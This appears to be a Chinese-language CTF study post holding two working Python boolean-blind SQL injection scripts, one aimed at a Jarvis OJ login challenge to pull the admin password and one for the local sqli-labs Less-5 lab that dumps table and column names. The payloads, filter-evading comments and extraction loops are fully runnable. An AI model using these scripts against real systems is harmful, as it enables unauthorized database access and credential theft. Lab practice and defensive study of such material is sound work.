sql注入盲注脚本

前言

选取了两道布尔盲注题作为例题,记录了几个典型写法的脚本(目标均为 CTF 靶场/本地 sqli-labs,脚本仅用于授权测试环境)

Simple Injection

题目地址

# -*- coding:utf8 -*-
import requests
import string

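# Candidate alphabet: digits first, then letters, then punctuation.
str1 = '1234567890' + string.ascii_letters + string.punctuation
flag = ''

# Alternative sub-queries to extract; `select` is the one actually used.
select0 = 'select/**/database()'
select1 = 'select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()'
select2 = 'select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_schema=database()'
select = 'select/**/password/**/from/**/admin'
url = "http://web.jarvisoj.com:32787/login.php"

# Response marker for the TRUE branch: when the injected condition holds the
# username row is found and the (wrong) password is rejected with this text.
TRUE_MARK = '密码错误'
MAX_LEN = 65       # upper bound on the extracted value (the original looped 1..65)
TIMEOUT = 10       # seconds; without a timeout a stalled server hangs the extraction forever


def build_payload(query, pos, ch):
    """Return the boolean-blind payload that tests character *ch* at 1-based *pos* of *query*'s result.

    The payload closes the username literal, ANDs an ``if(substr(...)='ch',1,0)``
    condition and re-opens the quote so the statement stays valid; spaces are
    written as ``/**/`` (presumably because the target filters whitespace —
    confirm against the challenge).

    NOTE(review): *ch* is spliced into a single-quoted SQL literal, so ``'`` and
    ``\\`` cannot be probed this way (they break the statement), and the ``=``
    comparison is case-insensitive under MySQL's default collation — compare
    with ``ascii()`` or ``binary`` if the value may contain such characters.
    """
    return "admin'/**/and/**/(if(substr(({}),{},1)='{}',1,0))/**/and/**/'1".format(query, pos, ch)


def extract(query, charset=str1, max_len=MAX_LEN):
    """Extract the result of *query* one character at a time and return it.

    Stops early when no candidate in *charset* matches a position, which means
    either the end of the value was reached or *charset* lacks the next
    character; the original kept going and silently produced a string with gaps.
    """
    session = requests.Session()   # reuse the TCP connection across the many probes
    found = ''
    for pos in range(1, max_len + 1):
        for ch in charset:
            data = {
                'username': build_payload(query, pos, ch),
                'password': 'admin',
            }
            r = session.post(url, data=data, timeout=TIMEOUT)
            if TRUE_MARK in r.text:
                found += ch
                print(found)
                break
        else:
            break   # no candidate matched: end of value or incomplete charset
    return found


if __name__ == '__main__':
    flag = extract(select)
    print(flag)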

sqli-labs Less-5

import requests
import string


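class GetInject:
    """Boolean-based blind extractor for a GET parameter (sqli-labs Less-5 style).

    Each probe appends a ``' and <condition> --+`` suffix to *url* and treats the
    presence of *mark* in the response body as the condition being true.
    """

    # MySQL string comparison is case-insensitive under the default collation and
    # table/column names are mostly letters, so lowercase letters are tried first.
    chr_str = string.ascii_lowercase + string.punctuation + string.digits

    def __init__(self, url, mark, obj, timeout=10, max_length=256):
        """
        Args:
            url: injection point including the parameter, e.g. ".../?id=1".
            mark: substring that only appears in a TRUE response.
            obj: SQL expression to extract, for example
                 obj = "database()"
                 obj = "select table_name from information_schema.tables where table_schema=database() limit 0,1"
            timeout: per-request timeout in seconds (a hung server otherwise stalls forever).
            max_length: upper bound probed by get_length(); bounds the otherwise endless loop.
        """
        self.url = url
        self.mark = mark
        self.obj = obj
        self.timeout = timeout
        self.max_length = max_length

    def _length_payload(self, n):
        """Suffix that is TRUE when length(obj) == n.

        If the injection point is double-quoted or numeric, adjust the quoting here.
        """
        return "' and length({0})={1} --+".format(self.obj, n)

    def _char_payload(self, pos, c):
        """Suffix that is TRUE when the character at 1-based *pos* of obj is *c*.

        NOTE(review): *c* is spliced into a quoted literal, so ``'`` and ``\\``
        from string.punctuation break the statement rather than being probed.
        """
        return "' and substr({0},{1},1)='{2}' --+".format(self.obj, pos, c)

    def get_length(self):
        """Return the length of obj by testing 0..max_length in turn.

        Raises RuntimeError instead of spinning forever when no length matches
        (wrong mark, filtered payload, NULL result, or a value longer than max_length).
        """
        for n in range(0, self.max_length + 1):
            r = requests.get(self.url + self._length_payload(n), timeout=self.timeout)
            if self.mark in r.text:
                print("len", n)
                return n
        raise RuntimeError(
            "no length in 0..{} matched; check mark/payload".format(self.max_length)
        )

    def get_name(self):
        """Extract obj character by character and return the recovered string.

        Reads self.url (the original used the module-level ``url``, so an
        instance built for a different target still probed the global one).
        """
        name_len = self.get_length()
        output = ''
        for pos in range(1, name_len + 1):
            for c in self.chr_str:
                r = requests.get(self.url + self._char_payload(pos, c), timeout=self.timeout)
                if self.mark in r.text:
                    output += c
                    print(output)
                    break
            else:
                # No candidate matched (character not in chr_str, or unprobeable
                # ' / \). Keep a placeholder so later positions stay aligned.
                output += '?'
                print(output)
        return output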


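# mark is the substring that separates a TRUE response from a FALSE one;
# for Less-5 it is "You are in".
url = "http://127.0.0.1/sqli/Less-5/?id=1"
mark = "You are in"
# Sub-queries to extract: all table names / all column names of the current schema.
obj_t = "(select group_concat(table_name) from information_schema.tables where table_schema=database())"
obj_c = "(select group_concat(column_name) from information_schema.columns where table_schema=database())"

if __name__ == "__main__":
    # Only obj_c is dumped here; swap in obj_t for the table names.
    test1 = GetInject(url, mark, obj_c)
    test1.get_name()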